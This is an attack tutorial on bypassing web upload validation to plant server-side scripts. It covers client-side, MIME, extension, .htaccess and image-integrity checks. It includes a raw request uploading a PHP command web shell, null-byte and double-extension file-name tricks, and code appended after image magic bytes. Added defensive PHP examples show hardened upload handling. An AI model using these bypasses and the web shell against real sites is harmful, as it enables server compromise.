Bypass Upload Validation Framework V0.9
CasperKid [S.Y. C]
2011.7.29
Contents
0x01 Client-side verification bypass (JavaScript extension check)
0x02 Server-side verification bypass (HTTP request packet check)
  - Content-Type (MIME type) check
0x03 Server-side verification bypass (extension check)
  - Blacklist check
  - Whitelist check
  - .htaccess file attack
0x04 Server-side verification bypass (file integrity check)
  - File header check
  - Image size and related information check
  - File loading check
0x05 Bypass analysis for each kind of check
0x06 Brief analysis of image code injection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Preface
Systems today are increasingly secure, and SQL injection is now hard to find on well-defended sites: decent .NET or Java frameworks pass user input as parameters, which blocks injection attacks outright. Outside PHP, the two most powerful web attacks are SQL injection and upload bypass (PHP additionally has remote file inclusion and code injection vulnerabilities).
Generally, as long as you can register an ordinary user account, you can find somewhere to upload an avatar or an attachment, and these spots are a good point of entry. If you can bypass the upload validation and then find the web path of the uploaded Trojan, the site is basically compromised.
This paper is far from perfect, but its classification framework is fairly complete. Given my limited personal experience the coverage is not exhaustive, and there are many places I have had no chance to test in practice and document. I hope readers with similar experience will share it, so that the paper can be improved and the exchange is worthwhile for everyone.
Blog: hi.baidu.com/hackercasper
0x01 Client-side verification bypass (JavaScript extension check)
Open the HTTP proxy tool Burp.
First try uploading a file named 2012.asa.
It does not upload.
Nothing arrives in Burp and a warning box pops up, so the check is done by client-side JavaScript.
It is enough to disable JavaScript, or to modify the request in the Burp proxy.
Here I use Burp: first rename the file extension to jpg,
then upload.
The file is now named 2012.jpg.
In Burp, change jpg to asp,
and upload again.
Finally the asp file is uploaded successfully.
0x02 Server-side verification bypass (HTTP request packet check)
- Content-Type (MIME type): suppose the server-side upload.php looks like this:

<?php
if ($_FILES['userfile']['type'] != "image/gif") { // checks only the Content-Type sent by the client
    echo "Sorry, we only allow uploading GIF images";
    exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    echo "File is valid, and was successfully uploaded.\n";
} else {
    echo "File uploading failed.\n";
}
?>
Then we change the Content-Type of the file part in the request packet from text/plain to image/gif:

POST /upload.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: libwww-perl/5.803
Content-Type: multipart/form-data; boundary=xYzZY
Content-Length: 155

--xYzZY
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: image/gif

<?php system($_GET['command']);?>
--xYzZY--

HTTP/1.1 200 OK
Date: Thu, 31 May 2007 14:02:11 GMT
Server: Apache
X-Powered-By: PHP/4.4.4-pl6-gentoo
Content-Length: 59
Connection: close
Content-Type: text/html

<pre>File is valid, and was successfully uploaded.</pre>

Any server-side check that only inspects the Content-Type of the HTTP packet can be bypassed the same way.
0x03 Server-side verification bypass (extension check)
- Blacklist check: a blacklist is less secure than a whitelist; at the very least it is easier to attack.
There is usually a dedicated blacklist file listing the common dangerous script extensions, for example the one shipped with FCKeditor 2.4.3 and earlier versions.
1. Find extensions the blacklist missed, for example asa and cer.
2. Possible case-sensitivity flaws, for example aSp and pHp.
3. Special file name construction: change the file name in the HTTP packet to help.asp. or help.asp_ (the underscore stands for a space). Windows does not allow such names, so they have to be set in Burp or a similar tool; they pass the check, and Windows then strips the trailing dot or space automatically.
4. IIS or nginx file name parsing vulnerabilities, for example help.asp;.jpg or http://www.xx.com/help.jpg/2.php
Note that the so-called nginx file name parsing vulnerability is actually a php-fpm file name parsing issue; see http://www.cnbeta.com/articles/111752.htm for details.
5. 0x00 truncation bypass: caused by a combination of logic flaws. Simple pseudocode:

name = getname(http_request)          // suppose the file name is help.asp[0x00].jpg (0x00 right after asp)
type = gettype(name)                  // gettype() scans from the end of the name, so it decides the type is jpg
if (type == jpg)
    SaveFileToPath(UploadPath + name, name)   // but 0x00 terminates the file name string,
                                              // so the file is saved under the path help.asp

6. Double-extension parsing bypass (1), based on the web server's parsing logic, as described in the Apache manual:
"Files can have more than one extension, and the order of the extensions is normally irrelevant. For example, if the file welcome.html.fr maps onto content type text/html and language French then the file welcome.fr.html will map onto exactly the same information. If more than one extension is given which maps onto the same type of meta-information, then the one to the right will be used, except for languages and content encodings. For example, if .gif maps to the MIME-type image/gif and .html maps to the MIME-type text/html, then the file welcome.gif.html will be associated with the MIME-type text/html."
Suppose you upload a file named help.asp.123 (or help.php.123 on a PHP server): the extension 123 is not on the blacklist, and it is not in Apache's list of resolvable extensions either,
so Apache looks for the next extension it can resolve, finds .php, and finally executes the file as PHP.
7. Double-extension parsing bypass (2), based on the web server's handler configuration. If the Apache configuration contains a line like
AddHandler php5-script .php
then any file whose name contains .php is handled as PHP,
so even test2.php.jpg is executed as PHP.
8. Dangerous parsing bypass, also based on the web server's handler configuration. If the Apache configuration contains
AddType application/x-httpd-php .jpg
then even a file with the jpg extension is executed as PHP.
- Whitelist check
A whitelist is safer than a blacklist, but that does not make it absolutely safe.
1. Special file name construction (same as blacklist item 3)
2. IIS or nginx file name parsing vulnerabilities (same as blacklist item 4)
3. 0x00 truncation bypass (same as blacklist item 5)
- .htaccess file attack: works against both blacklists and whitelists. The move_uploaded_file section of the PHP manual carries the warning
'If the destination file already exists, it will be overwritten.'
If PHP security is not configured properly, move_uploaded_file can therefore be used to overwrite the server's .htaccess file with your own,
and the parsing rules can then be defined at will.
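As an added example (not the paper's code), here is a hardened counterpart to the upload.php from 0x02 that closes the gaps described in 0x02 and 0x03: it ignores the client-supplied Content-Type, accepts exactly one lower-cased whitelisted extension, rejects the special file names, and never stores a file under the client's name, so the .htaccess overwrite cannot happen. It assumes the form field is still called userfile and that uploads/ is served with script execution disabled.

```php
<?php
// Added example, not from the original paper: a hardened counterpart to the
// upload.php shown in 0x02. Assumes the form field is still named "userfile"
// and that uploads/ is served with script execution disabled.

// Whitelist: permitted extension => MIME type the file bytes must actually have.
const ALLOWED = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                 'gif' => 'image/gif',  'png' => 'image/png'];

// Returns the permitted extension of $name, or null if the name is rejected.
// Rejects the tricks from 0x03: 0x00 bytes, ';' '/' '%' (IIS / php-fpm parsing,
// encoded nulls), more than one extension (help.php.123, test2.php.jpg, and
// .htaccess itself), trailing '.' or ' ', and mixed case such as pHp.
function safe_extension(string $name): ?string {
    if (strpos($name, "\0") !== false) return null;
    if (preg_match('#[/\\\\;%]#', $name)) return null;
    $parts = explode('.', $name);
    if (count($parts) !== 2 || $parts[0] === '') return null;
    $ext = strtolower($parts[1]);
    if ($ext !== trim($ext, ". ")) return null;
    return array_key_exists($ext, ALLOWED) ? $ext : null;
}

// Validates and stores one upload; returns a message for the user.
function handle_upload(array $file, string $dir): string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) return 'Upload failed.';
    $ext = safe_extension($file['name']);
    if ($ext === null) return 'Sorry, that file name is not allowed.';
    // Trust the bytes, not $file['type'] (the Content-Type chosen by the client).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) return 'Sorry, the content is not a ' . $ext . ' image.';
    if (getimagesize($file['tmp_name']) === false) return 'Sorry, not a valid image.';
    // Server-generated name: the client never chooses the stored path, so a
    // name such as .htaccess or help.asp%00.jpg can never reach the disk.
    $dest = rtrim($dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) return 'File uploading failed.';
    return 'File is valid, and was successfully uploaded as ' . basename($dest);
}

echo handle_upload($_FILES['userfile'] ?? [], 'uploads/');
```

The finfo and getimagesize checks stop the Content-Type trick of 0x02 but not a valid image with code appended to it; that case is what the re-rendering in 0x04 addresses.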
0x04 Server-side verification bypass (file integrity check)
- File header check: this mainly inspects the magic number of the image format at the start of the file content.
To pass a jpg check, the file must begin with the JPEG magic bytes;
to pass a gif check, with the GIF magic bytes;
to pass a png check, with the PNG magic bytes.
Your own Trojan is then appended after the file header.
- Image size and related information check: the getimagesize() function is commonly used for this.
You only need to forge the file header and then add some image information after the magic number.
The structure looks roughly like this:
GIF89a (...some binary data...) <?php phpinfo(); ?> (...rest of the binary data omitted...)
- File loading check
This is the nastiest kind of check. It normally calls an API or function to actually load the file; the common test is image rendering, sometimes even a second rendering (discussed below). There are two ways to attack a file loader: bypass the rendering test, or attack the loader itself.
Rendering test bypass
Use GIMP to inject code into an image.
The resulting data can be examined with WinHex. Tools of this kind work by finding a blank area that can be filled with code without breaking the rendering of the file, usually the image's comment section.
A basic rendering test can be bypassed this way.
However, if you run into a nasty secondary rendering, it cannot be bypassed; presumably the only option left is to attack the file loader.
For example, the file data before upload is as follows (figure not reproduced):
Then upload the jpg, but when it is downloaded back to the local machine something odd appears:
the uploaded image has been rendered a second time.
The new JPG contains this:
CREATOR: gd-jpeg v1.0 (using ijg jpeg v62)
It looks like PHP's GD library was called.
The same is true for the gif file tested.
The original file content is as follows (although the file name is 2.jpg, the actual format is gif):
After uploading and downloading, the file has been re-rendered and the code is gone.
Triggering an error reveals which API or function performs the secondary rendering:
uploading a gif with incomplete data produces an error showing that the backend uses imagecreatefromgif();
uploading a png with incomplete data produces an error showing that the backend uses imagecreatefrompng().
In my experience secondary rendering is almost impossible to bypass. It amounts to taking the original image data and re-rendering it with the server's own API or function, and in that process any non-image data is simply discarded.
Attacking the file loader itself usually means an overflow: after uploading a malicious file, the loader on the server triggers the attack when it performs its load test and executes shellcode, as in the Access/mdb overflow.
See http://lcx.cc/?Foxnews00001542.html
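Secondary rendering, which the author found nearly impossible to bypass, is also how a defender should store uploaded images. This added example (not the paper's code) re-encodes an upload with PHP's GD library, the same library whose "CREATOR: gd-jpeg" marker appeared above; only the decoded pixels are written back, so a comment block or script text appended after the image data is dropped. It assumes the GD extension is loaded and that $src is the upload's tmp_name.

```php
<?php
// Added example, not from the original paper: re-render an uploaded image with
// GD before storing it (the "secondary rendering" discussed in 0x04). Only the
// decoded bitmap is written out, so data hidden in a GIF/JPEG comment block or
// appended after the image data does not survive the copy.
// Assumes the GD extension is loaded; $src is the upload's tmp_name.

// Returns the path of the re-rendered copy, or null if $src is not a decodable
// JPEG, PNG or GIF. $destBase is the destination path without extension.
function rerender_image(string $src, string $destBase): ?string {
    $info = getimagesize($src);              // header/size check first
    if ($info === false) return null;
    // imagecreatefromstring() covers imagecreatefromgif/png/jpeg in one call
    // and returns false when the data does not decode as an image.
    $im = @imagecreatefromstring((string) file_get_contents($src));
    if ($im === false) return null;
    switch ($info[2]) {                       // IMAGETYPE_* of the input
        case IMAGETYPE_JPEG:
            $dest = $destBase . '.jpg'; $ok = imagejpeg($im, $dest, 90); break;
        case IMAGETYPE_PNG:
            imagesavealpha($im, true);        // keep transparency on re-encode
            $dest = $destBase . '.png'; $ok = imagepng($im, $dest); break;
        case IMAGETYPE_GIF:
            $dest = $destBase . '.gif'; $ok = imagegif($im, $dest); break;
        default:                              // any other format is refused
            imagedestroy($im); return null;
    }
    imagedestroy($im);
    return $ok ? $dest : null;
}

// Usage inside an upload handler (form field "userfile" as in 0x02); the stored
// name is generated by the server, never taken from the client.
if (isset($_FILES['userfile']) && $_FILES['userfile']['error'] === UPLOAD_ERR_OK) {
    $stored = rerender_image($_FILES['userfile']['tmp_name'],
                             'uploads/' . bin2hex(random_bytes(16)));
    echo $stored === null ? "Sorry, not a valid image.\n" : "Stored as $stored\n";
}
```

Re-encoding also means the loader itself parses attacker-controlled data, which is the overflow risk the paragraph above points at; keep the GD and libjpeg/libpng packages patched and, where possible, run the conversion in a separate low-privilege process.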
0x05 Bypass analysis for each kind of check
A. Client-side verification bypass (JavaScript extension check)
Bypass with an HTTP proxy tool (such as Burp) or by disabling JavaScript.
B. Server-side verification bypass (HTTP request packet check)
- Content-Type (MIME type): forge the Content-Type with an HTTP proxy tool (such as Burp).
C. Server-side verification bypass (extension check)
- Blacklist check
  Find extensions the blacklist missed, for example asa and cer
  Possible case-sensitivity flaws, for example aSp and pHp
  Special file name construction, for example changing the file name in the HTTP packet to help.asp. or help.asp_ (the underscore stands for a space)
  IIS or nginx file name parsing vulnerabilities, for example help.asp;.jpg or http://www.xx.com/help.jpg/2.php
  0x00 truncation bypass, caused by a combination of logic flaws
  Double-extension parsing bypass (1), based on the web server's parsing logic
  Double-extension parsing bypass (2), based on the web server's handler configuration
  Dangerous parsing bypass, based on the web server's handler configuration
- Whitelist check
  Special file name construction (same as blacklist item 3)
  IIS or nginx file name parsing vulnerabilities (same as blacklist item 4)
  0x00 truncation bypass (same as blacklist item 5)
- .htaccess file attack
  If PHP security is not configured properly, overwrite the server's .htaccess file with your own.